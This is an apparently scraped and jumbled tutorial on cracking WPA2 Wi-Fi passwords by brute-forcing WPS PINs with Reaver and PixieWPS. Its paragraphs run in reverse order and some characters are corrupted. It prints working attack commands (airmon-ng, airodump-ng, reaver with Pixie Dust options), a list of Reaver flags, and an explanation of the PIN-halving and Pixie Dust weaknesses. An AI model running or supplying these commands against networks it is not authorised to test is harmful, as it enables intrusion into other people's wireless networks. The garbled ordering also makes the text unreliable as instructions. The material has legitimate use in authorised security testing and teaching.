command: reaver -i wlan0mon -b -c -K 1 -vv Capture & Reaver Outputįrom the above figure, we can get the MAC of our target. command: airodump-ng wlan0mon Starting CaptureĮxecuting Airodump actually turns the terminal to an updating terminal which shows all information.
A full tutorial on this will be coming in the near future. We can choose whether or not to write the packets to a file. Command: airmon-ng checkĬommand: airmon-ng start wlan0 Reaver Initial Setup Reaver Initial SetupĪirodump dumps the packets received on the monitor interface. Do this repeatedly for all processes until airmon-ng check gives “no interfering” output. Start monitor interface inorder to start capturing packets from air.
W, -generate-pin Default Pin Generator by devttys0 team Belkin D-Link Lab : Crack WPA2 PSK network With Reaver & PixieWPS ScenarioĪttacker – Kali Linux(Sana) Machine (not VM)
P, -pixiedust-loop Set into PixieLoop mode (doesn't send M4, and loops through to M3) 2, -p2-index Set initial array index for the second half of the pin 1, -p1-index Set initial array index for the first half of the pin l, -lock-delay= Set the time to wait if the AP locks WPS pin attempts d, -delay= Set the delay between pin attempts p, -pin= Use the specified 4 or 8 digit WPS pin
Z, -no-auto-pass Do NOT run reaver to auto retrieve WPA password if Pixiewps attack is successful K -pixie-dust= Run pixiewps with PKE, PKR, E-Hash1, E-Hash2 and E-Nonce (Ralink, Broadcom, Realtek) q, -quiet Only display critical messages v, -verbose Display non-critical warnings (-vv for more) a, -auto Auto detect the best advanced options for the target AP o, -out-file= Send output to a log file c, -channel= Set the 802.11 channel for the interface (implies -f) i, -interface= Name of the monitor-mode interface to use Since this tutorial focuses on reaver, only reaver options are shown.
References: Wiki, HTG, Infosec Institute Options Pixie WPS can be executed alone or with the updated reaver package. PixieWPS is a tool which finds the WPS PIN from the captured hashed. This attack is only applicable to vulnerable devices. Then this PIN can be used by reaver to perform an online attack against the router to get the real passphrase. The PIN from reaver is put against the hashes received which confirms the real PIN.
He discovered that lack of randomization in the components of the 2 halves of the PIN would make offline bruteforcing possible. While the 2 halves of the PIN is exchanged, if the components of these packets are not properly randomized, the real PIN generated by Reaver could be used to perform an offline attack. Recently, a newer flaw was discovered by a security researcher named Dominique Bongard. It does an online attack on a WPS enabled AP trying out about 11000 PINS. A reaver is a tool which does exactly the same. So there is a drastic reduce in the number of guesses and eventually, it can be brute-forced in lesser time periods. So a total of 11000 guesses only, where it should be 10^8 = 100000000 guesses. So first half leaves 10^4 = 10,000 guesses & 2nd half leaves 10^3 = 1000 guesses.
Basically in WPS, the Access Point & the Client exchange a series of EAP messages. WPS is Wifi Protected Setup designed to quickly & easily authenticate a client to an AP mainly aimed for home users. PixeWPS is a new tool to brute-force the exchanging keys during a WPS transaction.
Reaver is a tool to brute-force the WPS of a WIFi router.